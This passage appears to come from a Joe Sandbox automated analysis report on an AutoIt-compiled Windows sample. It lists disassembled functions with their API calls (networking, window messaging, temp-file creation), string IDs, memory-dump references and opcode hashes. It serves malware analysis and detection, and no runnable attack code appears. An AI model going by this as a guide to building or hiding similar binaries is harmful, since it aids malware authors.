                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoItemMenu_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 2223754486-4108050209
                                                                                                                        • Opcode ID: d0fd2d2272f599adb8a2c71a451c9151ffaa714239a9c4ed3d63ebf9f44b14c2
                                                                                                                        • Instruction ID: 3249bee3ff59fbbb0107705b73309d2acffbe1fae7cafe28e248ee72f8b3cc95
                                                                                                                        • Opcode Fuzzy Hash: d0fd2d2272f599adb8a2c71a451c9151ffaa714239a9c4ed3d63ebf9f44b14c2
                                                                                                                        • Instruction Fuzzy Hash: BA11DD73901618ABDF22DB58EC48BDAB7F8AB06318F1A5021ED45FB190D370AD05D790
                                                                                                                        Function 00EA53F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00EA544C
                                                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00EA5475
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$OpenOption
                                                                                                                        • String ID: <local>
                                                                                                                        • API String ID: 942729171-4266983199
                                                                                                                        • Opcode ID: 576a5d02a2918c412b649d81201482eabed37136f19cbb1afc61cd0f072f56cd
                                                                                                                        • Instruction ID: dfab90570ebac30a2fe828e44759b643d3136add5757b7ae335cfc4360dfbe8b
                                                                                                                        • Opcode Fuzzy Hash: 576a5d02a2918c412b649d81201482eabed37136f19cbb1afc61cd0f072f56cd
                                                                                                                        • Instruction Fuzzy Hash: A511C172141A21BADB148F518C84EFABB68FF1F756F10912AF526AA040E2706980D6B0
                                                                                                                        Function 00EAACD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00EAACF5
                                                                                                                        • htons.WSOCK32(00000000,?,00000000), ref: 00EAAD32
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: htonsinet_addr
                                                                                                                        • String ID: 255.255.255.255
                                                                                                                        • API String ID: 3832099526-2422070025
                                                                                                                        • Opcode ID: f3d30ec089714413166c54066937c917c51d58971ff4c7b907b30ff25124034d
                                                                                                                        • Instruction ID: 7026817d9280eeca9c88968cd5fd8353f52348411f4bfb0b2d72918be1111503
                                                                                                                        • Opcode Fuzzy Hash: f3d30ec089714413166c54066937c917c51d58971ff4c7b907b30ff25124034d
                                                                                                                        • Instruction Fuzzy Hash: F601C435200305ABCB10AFA4DC45BADB3A4EF09718F14952BF515AB2D1D771F804C756
                                                                                                                        Function 00E8C577 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E8C5E5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend_memmove
                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                        • API String ID: 1456604079-1403004172
                                                                                                                        • Opcode ID: 7a56cb6b288bcfead88c02abf6520d041ffa76a9db205b7d8c0856cae046d29e
                                                                                                                        • Instruction ID: de8fd66adf57f96bef64892162657eedd889e1b4a10779ff3086d19b6b93af6e
                                                                                                                        • Opcode Fuzzy Hash: 7a56cb6b288bcfead88c02abf6520d041ffa76a9db205b7d8c0856cae046d29e
                                                                                                                        • Instruction Fuzzy Hash: 6601B571651218AFCB44FBA4CC61CFE77A9AB473117241A19F82BF72D2DE34A90C9760
                                                                                                                        Function 00E9C4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __fread_nolock_memmove
                                                                                                                        • String ID: EA06
                                                                                                                        • API String ID: 1988441806-3962188686
                                                                                                                        • Opcode ID: 6506e589471bf31691e2205175cecce158a5efc47803eda43011fbe1c1f8162f
                                                                                                                        • Instruction ID: 6623497812897c5db1b012608eae5f96b3730c3ee5dcf6dbf9437678c8a2ee9b
                                                                                                                        • Opcode Fuzzy Hash: 6506e589471bf31691e2205175cecce158a5efc47803eda43011fbe1c1f8162f
                                                                                                                        • Instruction Fuzzy Hash: A301F5B2900218AEDF28D7A8C816EFE7BF89B05711F00415AE197E21C1E5B4E7088B60
                                                                                                                        Function 00E8C473 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00E8C4E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend_memmove
                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                        • API String ID: 1456604079-1403004172
                                                                                                                        • Opcode ID: cf4f7e9670bb15e3fe497901cc6e4304026046dad6220b9d802214adf788e60f
                                                                                                                        • Instruction ID: 050911faa935537945d87748f17cb53bb882cee9cce5cdf68a664dfdbff958f7
                                                                                                                        • Opcode Fuzzy Hash: cf4f7e9670bb15e3fe497901cc6e4304026046dad6220b9d802214adf788e60f
                                                                                                                        • Instruction Fuzzy Hash: 50018F716411086BCB04FBA4C962AFF73E99B46301F241415A91BF32C2DA649E0CA7B1
                                                                                                                        Function 00E8C4F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00E8C562
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend_memmove
                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                        • API String ID: 1456604079-1403004172
                                                                                                                        • Opcode ID: 9ebb45b97665ef9de745525f89452dfa8f62cb4aa4c9ab1ce3060405e8e2f531
                                                                                                                        • Instruction ID: 5a0773d9c4a0587434b238f1f7504cb3797c8ad3b2d6e32e71c23ee43e58de90
                                                                                                                        • Opcode Fuzzy Hash: 9ebb45b97665ef9de745525f89452dfa8f62cb4aa4c9ab1ce3060405e8e2f531
                                                                                                                        • Instruction Fuzzy Hash: C301A2716411086BCB04FBA4C952EFF73E99B02701F241415B80BF32C2DA649F0DA3B1
                                                                                                                        Function 00E9804C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassName_wcscmp
                                                                                                                        • String ID: #32770
                                                                                                                        • API String ID: 2292705959-463685578
                                                                                                                        • Opcode ID: 4c4099ac08d27b65cc72f7418b3b5a107553df82c5ec6759d52e17757fc75537
                                                                                                                        • Instruction ID: 1dc3beeb4313f5d0e3cb342c45b505fd334be4bf71783a7f5fda80c2b59fa16f
                                                                                                                        • Opcode Fuzzy Hash: 4c4099ac08d27b65cc72f7418b3b5a107553df82c5ec6759d52e17757fc75537
                                                                                                                        • Instruction Fuzzy Hash: 72E0D8336042292BD720EAA6AC0AED7FBACEB52764F000026F924E3091DAB0D64587D0
                                                                                                                        Function 00E7DA03 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __umatherr.LIBCMT ref: 00E7DA2A
                                                                                                                          • Part of subcall function 00E7DD86: __ctrlfp.LIBCMT ref: 00E7DDE5
                                                                                                                        • __ctrlfp.LIBCMT ref: 00E7DA47
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __ctrlfp$__umatherr
                                                                                                                        • String ID: xn
                                                                                                                        • API String ID: 219961500-2689218296
                                                                                                                        • Opcode ID: d00e5f2ec6ce836f71591165b073af1a5d66079317362fb9350551e22a4840d0
                                                                                                                        • Instruction ID: ea736727ef9293fc2c3995bad33d6234485b59a9d3855320838373fdcf82068d
                                                                                                                        • Opcode Fuzzy Hash: d00e5f2ec6ce836f71591165b073af1a5d66079317362fb9350551e22a4840d0
                                                                                                                        • Instruction Fuzzy Hash: 79E06D7140C60EAADB02BF80ED066A93BF5FF54314F809095F98C24096DFB285B4D757
                                                                                                                        Function 00E8B35D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E8B36B
                                                                                                                          • Part of subcall function 00E72011: _doexit.LIBCMT ref: 00E7201B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message_doexit
                                                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                                                        • API String ID: 1993061046-4017498283
                                                                                                                        • Opcode ID: 57fb826242706297f204709e48aff51b1a334c1f513130a6106ab2e1ade79f8d
                                                                                                                        • Instruction ID: 4e9d2e129d22e9dc2b5a43370a3472c1f619d3af6d9f46cf9a4eade7265e7ac3
                                                                                                                        • Opcode Fuzzy Hash: 57fb826242706297f204709e48aff51b1a334c1f513130a6106ab2e1ade79f8d
                                                                                                                        • Instruction Fuzzy Hash: 70D0123128935C32D21632957C0BFC966C88F05B55F046416BF4C751C28AD1D490A2E9
                                                                                                                        Function 00ECBC74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 00ECBAB8
                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00ECBCAB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectoryFreeLibrarySystem
                                                                                                                        • String ID: WIN_XPe
                                                                                                                        • API String ID: 510247158-3257408948
                                                                                                                        • Opcode ID: 335253a484af43cda9cfc852ad29e3d175fb010ed0151e0a516c65d0d6fbb78a
                                                                                                                        • Instruction ID: 6e00523e41cc214da53c6e1bfc74836ce681d235e1a20c7a0bc994d86fba3ff0
                                                                                                                        • Opcode Fuzzy Hash: 335253a484af43cda9cfc852ad29e3d175fb010ed0151e0a516c65d0d6fbb78a
                                                                                                                        • Instruction Fuzzy Hash: 03E0C970C0510DEFCB15DBA9DD4AAECB7B8BB08340F14948AE062B6150C7725A46DF21
                                                                                                                        Function 00EB84C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EB84DF
                                                                                                                        • PostMessageW.USER32(00000000), ref: 00EB84E6
                                                                                                                          • Part of subcall function 00E98355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00E983CD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                        • Opcode ID: e9cd49b6b4fa70abd6e68e3e68a9615033cf05ebb3992b90b47b5dbd6adffd7e
                                                                                                                        • Instruction ID: 0f881d2286874e52c38eb444a275ebda77908ced5dfe2507d42a2c0e22c5ec58
                                                                                                                        • Opcode Fuzzy Hash: e9cd49b6b4fa70abd6e68e3e68a9615033cf05ebb3992b90b47b5dbd6adffd7e
                                                                                                                        • Instruction Fuzzy Hash: B7D0A9323893007BEA20A331AD0BFC66A48EB18B10F00082A720ABA1D0C8E0B8048260
                                                                                                                        Function 00EB8495 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EB849F
                                                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00EB84B2
                                                                                                                          • Part of subcall function 00E98355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00E983CD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                        • Opcode ID: f4706bbf7e4664667dcd6e8f09cbb8368bf873ccde44b1501b929123efa2dfc5
                                                                                                                        • Instruction ID: 73a05b956f6d5e3bc39e62b7d46fa3f8d6cb9e487f7093a8ac405617fd3180d1
                                                                                                                        • Opcode Fuzzy Hash: f4706bbf7e4664667dcd6e8f09cbb8368bf873ccde44b1501b929123efa2dfc5
                                                                                                                        • Instruction Fuzzy Hash: 34D0C972389314BBEA64A771AD4BFD66A58EB14B11F04096A725ABA1D0C9E0A8048660
                                                                                                                        Function 00E9D009 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00E9D01E
                                                                                                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00E9D035
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Temp$FileNamePath
                                                                                                                        • String ID: aut
                                                                                                                        • API String ID: 3285503233-3010740371
                                                                                                                        • Opcode ID: 69817263a0612209c663f685fd57851c339c1f79ab8015a51805d1f95220e12b
                                                                                                                        • Instruction ID: daee04b25aa2e6294177515cd0bd3e1c9281fb0f015fb03d46bc9082770014f6
                                                                                                                        • Opcode Fuzzy Hash: 69817263a0612209c663f685fd57851c339c1f79ab8015a51805d1f95220e12b
                                                                                                                        • Instruction Fuzzy Hash: 2CD05EB154530EBFDB10ABA0ED0EF99776CE700704F1041917614E10E1D2B0E6498BA1